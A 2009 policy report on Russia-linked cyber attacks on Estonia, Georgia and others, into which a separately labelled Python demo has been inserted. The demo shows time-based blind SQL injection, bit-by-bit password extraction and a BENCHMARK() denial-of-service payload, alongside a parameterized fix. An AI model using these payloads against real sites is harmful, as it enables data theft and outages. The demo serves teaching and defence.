May 13, 2009
Russia and the Cyber Threat
What Is Cyber Security?
Please see the glossary for an explanation of terms used in this document.
Cyber security is becoming a buzzword in the public understanding of national security. In November 2008, computer-based attacks on the Department of Defense, Department of State, and White House made national news. In August 2008, cyber attacks on Georgia, originating in Russia, were widely reported and debated. Though public awareness of these attacks is recent, professional attention has focused on cyber threats for much longer. The first presidential commission to report on the potential for a cyber threat to national security was in 1998, and in 2001, President George W. Bush declared cyber security a national priority. In 2002, the Professionals for Cyber Defense, a group of cyber security experts, wrote an open letter to President Bush, warning him of the potential for a terrorist cyber attack on critical infrastructure in the United States and urging him to create a Manhattan Project-style cyber defense project. After a series of cyber attacks in 2007 on the Departments of Defense, State, Commerce, and Homeland Security, as well as NASA and the National Defense University (during which the defense secretary’s unclassified email was hacked), President Bush signed a highly classified order in January 2008 that created the Comprehensive National Cybersecurity Initiative (CNCI). In July 2008, then-presidential candidate Barack Obama showed similar concern about cyber security, vowing to declare the American “cyber infrastructure a strategic asset” should he become president. In early December 2008, the Center for Strategic and International Studies Commission on Cybersecurity for the 44th Presidency, which began work in August 2007, released its report and recommendations on a national cyber security policy, which included the creation of a comprehensive national strategy that goes beyond the CNCI and includes strict privacy protection, the creation of a so-called cyber czar in the Executive Office of the President, and stricter regulation of cyberspace.
While the narrow definition of cyberspace refers strictly to the Internet, a more comprehensive definition that includes all forms of networked and digital activity is more appropriate when addressing issues of cyber security. In addition to Internet threats that can take down networks (e.g., malware, viruses, Trojans, and denial of service [DOS] attacks) and those that can steal, contaminate, or destroy information (e.g., malware, Trojans, worms, and phishing), cyber attacks can involve the disruption of telephone networks, satellites, weapons systems, banking systems, and even utility networks. While cyber crime and cyber attack are both easily defined, distinguishing cyber warfare and cyber terrorism from them is difficult. Some experts argue that any cyber attack that causes widespread harm is cyber war, though that raises the question of what constitutes harm—psychological, economic, or physical, or some combination of them. Other experts argue that cyber attacks can be categorized as warfare only if they take place alongside actual military operations; this definition says nothing about the level of harm caused. Under the first definition, the 2007 cyber attacks on Estonia, which also originated in Russia, would constitute cyber warfare, but those against Georgia in 2008 would not (depending on what is counted as harm). Under the second definition, the Georgia attacks would be considered cyber war, but the Estonia attacks would not. Cyber terrorism is even more controversial: some experts argue it cannot exist because cyber attacks are unlikely to create terror, while others (such as the National Conference of State Legislatures) limit it to the use of information technology for attacks or threats by terrorist organizations.
The broadest definition, created by Kevin Coleman of the Technolytics Institute, classifies cyber terrorism as “the premeditated use of disruptive activities, or the threat thereof, against computers and/or networks, with the intention to cause harm or further social, ideological, religious, political, or similar objectives. Or to intimidate any person in the furtherance of such objectives.” It is worth noting that this definition of cyber terrorism would include all the attacks originating in Russia that are discussed throughout this report.
The primary origins of cyber threats to the United States are Russia, China, and terrorist organizations. Though the Professionals for Cyber Defense referred to Iran as a cyber threat in 2002, Iran does not yet seem to possess the cyber capabilities or experience necessary to warrant this label. This report will focus on Internet-based cyber attacks, which seem to be the primary cyber threat emanating from Russia.
Russia and Cyber Attacks
In recent years, Russia has been accused of conducting cyber attacks or cyber terrorism against political opponents. The Russian government has denied all culpability, pointing out that though the attacks can be traced to Russia, they cannot be traced to government agents or computers. Instead, it maintains, these attacks were incidents of “hacktivism,” perpetrated out of patriotism by anonymous citizens. Even if these attacks could be traced to government computers, that would not be solid proof of government direction. A number of the attacks have included DOS attacks using a vast bot network. A bot is a computer infected by a virus, worm, or other malware that reprograms the computer to respond, on command, to an outside server (the command and control, or C&C, server). The C&C server can then order a network of such bots to participate in a DOS attack. Think of it as cyber brainwashing. In the May 2007 cyber attacks on Estonia, a number of Estonian government computers were infected and became part of the attacking bot network. If Russian government computers had been involved, the Kremlin could have claimed the computers were infected bots. If a large number of its computers had been involved, the Russian government would have lost its deniability, but that has yet to be the case. A closer examination of the cyber environment in Russia—in particular, the close connections between hacktivism and cyber crime, and between cyber crime and the government—contradicts the Russian government’s denial of involvement.
The Cyber Environment
One of Russia’s greatest cyber advantages is its wealth of human capital. Russia has a very high education rate that, combined with the Soviet legacy of emphasizing math and science education, has created a large labor pool of well-educated technology specialists. Just as “ekonomist” used to be the most popular college degree in Soviet times, “programmist” is now. This is also a relatively cheap labor pool: though Russian IT specialists make more than average Russian workers do, they are paid only 15-20 percent as much as American IT specialists, despite their reputation for reliability and creativity. The software industry is one of the most productive sectors in Russia and certainly the most internationally competitive. Russia’s software industry is booming and expanding into the international market, but its hardware subsector lags behind. Broadband, while currently small, is growing, and wireless Internet is rapidly expanding in major cities, especially Moscow. Internet penetration and use remain low, especially outside of the big cities. Overall, the IT sector has great potential for development, but the government does not seem to rank developing the IT sector high among its priorities, despite calls for Russia to become a nanotechnology leader. There is also one serious weakness in Russia’s IT labor pool: though they are highly educated, many Russian IT specialists lack experience on different systems and have little understanding of the broader IT industry.
Given Russia’s wealth of computer-savvy individuals who have limited outlets for their skills, it is no surprise that hacking and cyber crime are common there, especially in the broader context of other crime and law-bending. Corruption is rampant in Russia on all levels, fostering an attitude of indifference toward laws, as well as admiration for those who successfully break them. While the majority of Russians consider corruption wrong, many of them also are perfectly willing to cooperate in it when it benefits them. Most cyber crime in Russia is financially motivated, such as carding, phishing, and extortion. The use of Trojans, malware, and spybots also is very common. Hacking for the sake of a challenge and politically motivated “hacktivism” are also present, and these tend to involve Web site defacement and distributed denial of service (DDOS) attacks. Most cyber crime is aimed at foreign targets, especially Western financial institutions, which makes law enforcement difficult and contributes to the esteemed reputation that khakery (Russian hackers) have in Russian society. There is a culture of resentment in Russia aimed toward rich Westerners: if they don’t properly secure their networks and Web sites, they deserve to be scammed. Russian law enforcement expends very little effort on cyber crime unless it is aimed at Russians and Russian businesses; attacks on foreign businesses are not regarded as its problem. There are even widely available magazines for hackers, such as Khaker, that thrive despite the strict governmental control on all media (which often overrides the “free speech” guarantee). Khaker’s Web site, xakep.ru (whose Latin spelling mimics the Cyrillic spelling of “hacker”), is bustling and easily accessible.
Russian authorities’ tepid response to cyber crime is due as much to incapacity as to apathy. There are few policemen who are skilled in fighting cyber crime, and even fewer willing to forgo the greater prestige and resources associated with other crime fighting fields such as narcotics and organized crime. Interestingly, there is strong evidence that Russian organized-crime syndicates have become very involved in cyber crime, though this does not seem to factor into the Russian police approach, which continues to segregate cyber crime from all other crime fields. The coordination, strategic sophistication, and targets of certain cyber attacks indicate that they are often committed by a well-financed and experienced group (or groups) of criminals.
Russian Business Network
The Russian Business Network (RBN) is one such group. RBN is a cyber crime organization that ran an Internet service provider (ISP) until 2007 and continues to be heavily involved in cyber crime such as phishing, malware distribution, malicious code, botnet command and control, DDOS attacks, and child pornography. Though the most recent structure of RBN began in 2005, there are rumors that date RBN (as an unofficial group of cyber criminals) back to 1996. In 2002, the group became more structured and more active. It was accused of attacking the United States Department of Defense and the Russian Department of the Treasury in 2003, though none of this can be proven officially. While it is not certain that RBN is directly connected to the Russian mafia, it is highly likely. RBN is heavily involved in child pornography, which is traditionally controlled by the Russian mafia, and its official leader, who goes by the alias “Flyman,” is suspected of running those operations (and of possibly being a pedophile himself). It is also known that Flyman has family connections to the government: his father or uncle was involved in politics in St. Petersburg before taking an important position at a ministry in Moscow. Another RBN member, Aleksandr Boykov, is a former lieutenant colonel in the Federalnaya Sluzhba Bezopasnosti (FSB, the successor agency to the KGB). While it is currently not possible to prove that RBN has worked in tandem with the FSB or other security services (collectively, the siloviki), it is likely that they are at least connected.
When RBN officially hosted Internet services between early 2006 and November 2007, it was linked to 60 percent of all cyber crime. Due to increased pressure (including blocking and blacklisting of RBN IP addresses and domains) from the cyber security industry and increased attention in published reports and news articles, RBN attempted to restructure itself in October 2007, concealing its affiliation with a variety of IP address ranges. When this failed, it deleted a number of its domains and shut down, moving to Chinese and Taiwanese networks on November 6, 2007. This failed to divert attention, however, and two days later, it ceased routing traffic on its networks. However, it would be incorrect to say that RBN no longer exists or even that it has disbanded. While it no longer runs an ISP, the group appears to be active still, and harder to track, in a much more dispersed form across a variety of mostly legitimate ISPs. In general, Russian cyber crime certainly has not decreased with the end of RBN’s ISP. Instead, it continues to grow, spread across a variety of ISPs and domains, and in February 2008, Russia surpassed China as the largest generator of malware, with 27.9 percent compared to China’s 26.5 percent (the United States is a distant third at 9.98 percent). Cyber security experts continue to use the term “RBN” to refer to the loosely organized group of cyber criminals based in Russia, and cyber activity and crime by this group remain high.
Cyber Warfare and Hacktivism
While the most well-known cyber attacks attributed to Russia and the Russian government have occurred only within the last two years, cyber attacks have long been a part of Russian strategy. At an international conference in 1998, Oleg Gordievsky, a KGB colonel who defected to MI6 in 1985, spoke about the alternative to prison that Russia sometimes offered to hackers convicted of cyber crimes: working for the FSB. The editor of Khaker confirmed the FSB’s use of hackers for domestic and foreign espionage. In 1999, the Moonlight Maze operation, a series of coordinated cyber attacks, penetrated computer networks at the Pentagon, NASA, university research centers, and defense contractors. In the attacks, which took place over the course of a year, hackers stole millions of dollars’ worth of research and development secrets. The attacks were traced back to Russia, and it is suspected this was a government-sponsored espionage campaign. One domestic target of FSB cyber activities has been Chechen rebel Web sites. In 2002, timed to coincide with the Russian Special Forces actions in the Moscow theater crisis, the main Chechen rebel Web sites were attacked by a group of hackers using a rather sophisticated method. All indicators point to the FSB. Given RBN’s connections to the Kremlin, its suspected 2003 attack on the Pentagon may have been a siloviki-ordered instance of Russia’s cyber warfare. In another indication that the government encourages, if not directs, the use of cyber attacks against political opponents, Russian Duma deputy Nikolai Kuryanovich wrote a letter in March 2006 congratulating hackers on an attack against Israeli Web sites, urging the hackers to continue their work and claiming, “In the very near future, many conflicts will not take place on the open field of battle, but rather in spaces on the Internet, fought with the aid of information soldiers, that is, hackers.”
The Russian government also pursues a policy of censoring independent or opposition Web sites, and while those sites registered in the country often are easily shut down, many such sites have responded by moving outside of the .ru domain. Since Moscow has yet to convince Western governments to cooperate in shutting down such Web sites (usually designated as “extremist” or “terrorist” by the Kremlin), the new strategy has been to use cyber attacks to shut down the Web sites. This occurred in 2005, after Sweden refused to take down a pro-Chechen site registered there, and the Kremlin tried to take down the prominent opposition Web site, Ingushetia.ru, by similar means after it moved to the .org domain in September 2008.
Since 2006, there have been four major incidents of hacker attacks originating in Russia against foreign governments. In March 2006, during the Ukrainian parliamentary elections, the Ukrainian Central Election Commission’s servers and network were repeatedly attacked, totaling nearly 29,000 attacks. Most failed, so the servers continued to operate. iDefense attributes responsibility to Russian actors or even the Russian government.
The next cyber attack is one of the most well known. In late April 2007, Estonia came under a series of very serious cyber attacks originating mainly in Russia. The attacks were in response to tensions surrounding the relocation of a World War II memorial depicting a Soviet soldier. They were planned in advance and at least somewhat coordinated, as Russian-language forums were full of the preparations and planning in the days leading up to the attacks. The Estonian government even planned to release news of the strike three days before it began, but was dissuaded by the European Union (EU) because of an upcoming meeting between German chancellor Angela Merkel, whose government then held the EU presidency, and Russian president Vladimir Putin. The attacks were mostly DDOS, using vast bot networks of malware-infected computers (many of which were within Estonia), and managed to seriously strain Estonia’s Web servers and networks. While these attacks cannot be directly traced back to the Russian government, the Kremlin is widely suspected to have at least encouraged them and perhaps been involved through groups with government ties, such as RBN. The Kremlin’s refusal to cooperate with Estonian and NATO investigations into the attacks indicates Russian government or siloviki involvement.
On June 25, 2008, the Estonian television channel ETV24 reported the prevalence of appeals for cyber attacks by Russian hackers against Estonia, Latvia, Lithuania, and Ukraine on Russian Internet forums. The following weekend, a cyber attack against Lithuania began, and government, commercial, and private Web sites were defaced with vicious slogans and Communist symbols (earlier that summer, Lithuania passed a law against the display of Communist symbols, angering Russia). The attack was short and the Web sites were fixed by early July. However, Lithuania was hit again on July 20, when the state tax Web site was taken down for the weekend with DDOS attacks. Both attacks can be traced back to Russia. That same day, the Georgian president’s Web site was taken down for more than twenty-four hours by DDOS attacks that were traced back to Russia and operatives connected to RBN.
Over the next couple of weeks, Russian Web forums were filled with active discussions about whether attacks and defacements aimed at Georgian Web sites were wise or if they would become a tool for the Western media to use against Russia. The attacks, which were initially assumed to be mainly DDOS, began shortly before Russian troops entered Georgia on August 8, and the defacements and the peak of attacks hit the same day. The Georgian government’s Web site was taken offline, as were a number of Georgian news sites. Some retaliatory hacking took place, as RIA Novosti (a Russian news service) was taken offline for ten hours and a couple of South Ossetian sites were defaced, showing the content of a Georgian news site instead of their own content. However, some of the attacks continued through late August. Initial assessments categorized the perpetrators into two groups—script kiddies and hacktivists, and government and criminal-linked groups—and assumed they worked separately but concurrently.
Further study of these attacks—especially by Project Grey Goose, the open-source social network analysis of the cyber attacks, run by Jeff Carr of the IntelFusion blog—proves some of these assumptions wrong. Project Grey Goose collected data from two Russian hacker Web sites: the aforementioned xakep.ru, Khaker’s Web site; and a private, password-protected Web site, StopGeorgia.ru, linked on xakep.ru. Project Grey Goose found that while some of the attacks were basic DDOS, most used a much more sophisticated technique: a new twist on SQL injection that deliberately used the MySQL BENCHMARK() function to cause a DOS. SQL, or Structured Query Language, is the language used to manage and query databases. An SQL injection exploits insecure application coding. When a Web application builds its database queries by pasting in user input without proper filtering or parameterization, a hacker can supply input that the database interprets as additional SQL commands, using the Web site itself as the channel that delivers those commands to the database behind it. The hacker can then steal, corrupt, or destroy data, as well as compromise the system hosting the database. One limitation of SQL injection is that the application will not always display the results of the injected query (this situation is called a blind SQL injection). To get around this, hackers began using BENCHMARK(), a MySQL function that evaluates an expression a specified number of times, wrapped in a Boolean (true or false) condition inside the injected query. If, and only if, the condition is true, the database runs the BENCHMARK() expression. Hackers choose expressions and repetition counts that are CPU intensive and therefore take measurable time, stalling the database server that answers the query. If the Web page stalls briefly before loading, the hacker knows the condition was true, and a series of such yes/no questions lets the hacker read data out of the database without ever seeing query output. While this is a sophisticated attack, it is not unheard of.
What made the Russian hackers’ attack unique was the use of BENCHMARK() not as a timing signal but to tie up the database server’s CPU outright, producing the effect of a DOS attack. This was something Project Grey Goose members had never seen before and found very concerning. An SQL injection attack can result in corrupted databases and stolen data, hacker access to legitimate usernames and passwords, compromise of the machine hosting the database, and use of that machine as a foothold for attacking the internal network. More alarmingly, when the SQL injection is run under cover of a DOS attack, it is extremely difficult to detect, so the victims might not know the extent of the compromise of their machines, systems, and networks.
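The blind, timing-based injection and its DOS variant described above, as an added example that is not part of the original report or of Project Grey Goose’s material. It runs against an in-memory SQLite database with constructed sample data; because SQLite has no BENCHMARK(), a Python stand-in named BENCHMARK is registered to mimic the CPU cost of MySQL’s builtin (the table, the password value, the iteration count, and the timing threshold are all assumptions). The vulnerable lookup splices user input into the query text; the attacker sees no query output, only the response delay, yet recovers a password character bit by bit; the parameterized lookup treats the same payload as an unmatched name. The unconditional DOS payload is built but only run with a tiny iteration count.

```python
import sqlite3
import time

# Constructed sample data; nothing here comes from the report.
SECRET_PASSWORD = "s3cret"
SLOW_ITERATIONS = 3_000_000   # work per BENCHMARK() call: roughly 0.2-0.5 s on CPython
_benchmark_calls = 0          # instrumentation: how often the stand-in BENCHMARK() ran


def benchmark_calls():
    """Number of times the stand-in BENCHMARK() has been evaluated (for inspection)."""
    return _benchmark_calls


def make_db():
    """In-memory SQLite database plus a Python stand-in for MySQL's BENCHMARK(count, expr)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", SECRET_PASSWORD), (2, "bob", "hunter2")])

    def benchmark(count, expr):
        # MySQL evaluates `expr` `count` times and returns 0; this only burns comparable CPU.
        global _benchmark_calls
        _benchmark_calls += 1
        x = 0
        for _ in range(count):
            x = (x * 1103515245 + 12345) & 0xFFFFFFFF
        return 0

    # Not flagged deterministic, so SQLite re-evaluates it for every row, as MySQL would.
    conn.create_function("BENCHMARK", 2, benchmark)
    return conn


def lookup_vulnerable(conn, name):
    """The defect: untrusted input is spliced into the SQL text, so a quote ends the literal."""
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Parameterized query: the driver passes `name` as data, never as SQL."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


def timed_payload(condition):
    """Injection that burns CPU only when `condition` is true. No rows come back:
    BENCHMARK() yields 0, so `= 1` is false and the result set stays empty.
    (On MySQL attackers write IF(cond, BENCHMARK(...), 0); CASE is the portable form.)"""
    return (f"x' OR (CASE WHEN {condition} THEN BENCHMARK({SLOW_ITERATIONS}, 'x') "
            f"ELSE 0 END) = 1 -- ")


def condition_is_true(conn, condition, threshold=0.1):
    """Attacker-side probe: the only signal is how long the page took to come back."""
    start = time.perf_counter()
    lookup_vulnerable(conn, timed_payload(condition))
    return time.perf_counter() - start > threshold


def extract_char(conn, position):
    """Recover one character of alice's password, one bit per timed probe (7 bits for ASCII).
    unicode()/substr() are SQLite names; MySQL would use ORD()/SUBSTRING()."""
    code = 0
    for bit in range(7):
        cond = (f"(unicode(substr((SELECT password FROM users WHERE id = 1), "
                f"{position}, 1)) >> {bit}) & 1 = 1")
        if condition_is_true(conn, cond):
            code |= 1 << bit
    return chr(code)


def dos_payload(iterations=50_000_000):
    """Unconditional variant: every request pins a database CPU. The WHERE clause is
    evaluated once per row, so the cost grows with the size of the table."""
    return f"x' OR BENCHMARK({iterations}, 'x') = 1 -- "


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "alice"))          # normal use: [(1, 'alice')]
    print(extract_char(conn, 1))                     # 's', read purely from timing
    print(lookup_safe(conn, timed_payload("1=1")))   # []: the payload is just an odd name
```

Two things worth noticing when running it. The attacker never receives a row, which is why ordinary "did the query return data" monitoring misses this; only the response latency leaks the bit. And the stand-in BENCHMARK() is invoked once per row of the table, so on a real MySQL backend the unconditional payload costs the attacker one HTTP request and costs the victim a CPU core for as long as the table is large and the count is high.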
This attack was much more sophisticated than previous Russian cyber attacks. As evidenced by site traffic, the attack was clearly the result of days of planning, serious organization, and targeted reconnaissance. Given that some of the cyber attacks began before Russia’s ground assault on Georgia and how quickly the StopGeorgia.ru Web site appeared, it is clear that the organizers of the cyber attack had foreknowledge; if the attack organizers were not directly affiliated with the government, military, or security services, they at least had some sort of connections. Project Grey Goose also found that the amateurs and professionals were not isolated groups, as previously assumed. Instead, the attack organizers used a journeyman-apprentice approach in which computer- and Internet-savvy hackers (perhaps working for the government or RBN, or at least connected to them) set up the Web site; planned and organized the attacks; and provided the necessary tools, directions, and training, along with guidance along the way, to amateurs, average computer users, and other “Russian patriots” recruited to help out.
Other cyber security experts investigating the attacks on Georgia also found evidence of involvement by members of RBN and the security services. The defacement of Georgian president Mikheil Saakashvili’s Web site, which included a photo collage comparing him to Adolf Hitler, is considered a psychological operation; to many cyber experts, its sophistication suggests the involvement of the siloviki. Jart Armin, author of a blog appropriately named “Russian Business Network,” who helped take down RBN’s ISP, and James McQuaid of the Secure Home Network blog were both able to trace attacks back to RBN members. McQuaid identified Alexandr Boykov and Sergei Smirnov as tied to the domains and IP addresses from which at least some of the attacks originated. He also traced the main spam campaign, an e-mail purporting to be from the BBC that claimed Saakashvili was gay and linked to a virus-infected Web site, to Alexei Vasiliev via that Web site’s IP address. Vasiliev is affiliated with RBN, as is Sergei Astakov, to whom McQuaid was able to trace the C&C server for many of the botnet DDOS attacks.
The Future Role of Cyber Attacks
While none of the investigations into the cyber attacks on Georgia or Estonia have proof of Russian government involvement, they have found significant evidence of the involvement of RBN and, at the very least, implicit encouragement from the government. As Project Grey Goose stated in its phase one report, there are limits to open-source intelligence that may have prevented it from finding the government links, and “it is not reasonable to conclude that no such connection exists.” The use of cyber attacks as a political strategy seems to be gaining credence and popularity in Russia (perhaps as innovation also rises), and when Russia is involved in future political conflicts, we can expect to see a strong cyber involvement. It will likely follow a similar pattern of strong deniability on the Russian government’s part, concrete links to RBN members, probable connections to the siloviki, the journeyman-apprenticeship approach, implicit government support for the “Russian patriot” hackers, and Russian government refusal to cooperate with international investigations. Particularly concerning for the former Soviet republics, the United States, and others who find themselves in disagreement with Russia are the growing sophistication of the attacks; the possible expansion of attackers’ recruits to Russian expats; and the possibility of Russian cyber warriors selling their skills, labor, and expertise to other states (such as Iran) or organizations (such as Hamas or Hezbollah, which enjoy sympathy and support in Russia). There is already evidence this has occurred. In late January 2009, DDOS attacks originating in Russia took down three of Kyrgyzstan’s four ISPs. 
Of the two motives offered for this attack—that they were part of a Kremlin-backed campaign to persuade Bishkek, the capital of Kyrgyzstan, to expel the United States from the airbase at Manas, or that Russian hackers were hired by Kyrgyzstan president Kurmanbek Bakiyev to silence his political opposition—the latter has gained more credence. The attacks are a repeat of the cyber attacks against the Bakiyev-led opposition in 2005, on the eve of the Tulip Revolution, and coincide with a larger crackdown on the opposition by the Kremlin-supported president. Moscow controls the servers from which the attacks occurred; while not directly involved, the Kremlin could have chosen to stop the attacks if it so desired. This tacit approval is a pattern sure to be continued. While it is not a new concern in national security, cyber security is a concern that demands much more attention than it has received.
Glossary
bot- a computer infected by a virus, worm, or other malware that reprograms the computer to respond, on command, to an outside server
carding- the process of verifying stolen credit card data before using it for large frauds
command and control (C&C) server- the server that issues commands to a network of bots, for example ordering them to take part in a denial of service attack
cyberspace- the global electromagnetic domain that includes all forms of networked and digital activities
cyber attack- an attack that involves the cyber domain
cyber crime- any criminal activity that takes place in, through, or directly with cyberspace
cyber security- the field of maintaining the integrity and confidentiality of systems, networks, equipment, and communications that use cyberspace
cyber terrorism- the premeditated threat or use of disruptive activities against computers and networks, with the goal of causing harm or intimidation or to further a political, social, religious, or other agenda
cyber warfare- 1. any cyber attack that causes widespread harm; 2. cyber attacks that take place alongside actual military operations
denial of service (DOS) attack- a cyber attack with the intent of making a computer resource unavailable; the most typical method involves overloading a machine, Web site, or server with external communication requests, slowing it down and preventing it from receiving or responding to legitimate requests
distributed denial of service (DDOS) attack- a DOS attack that originates from multiple compromised computers; the individual computers become part of the bot network controlled by the C&C server
hacktivist- a hacker who has a political purpose
malware- malicious software designed to infiltrate or damage a computer or server
phishing- a form of fraud involving trying to obtain sensitive information by masquerading as a legitimate or trustworthy entity
script kiddie- an amateur malicious hacker (usually someone who uses programs developed by others)
spamming- abusing e-mail to indiscriminately send bulk messages
Trojan- a type of malware that masquerades as something useful or something that performs a desired function
virus- a malicious computer program that can copy itself and infect a computer without the permission or knowledge of the computer’s user
worm- a self-replicating program that uses the network to send copies of itself to other computers without any user action; unlike viruses, which attach to a host program and usually damage the infected computer, worms spread on their own and usually damage the network by consuming its bandwidth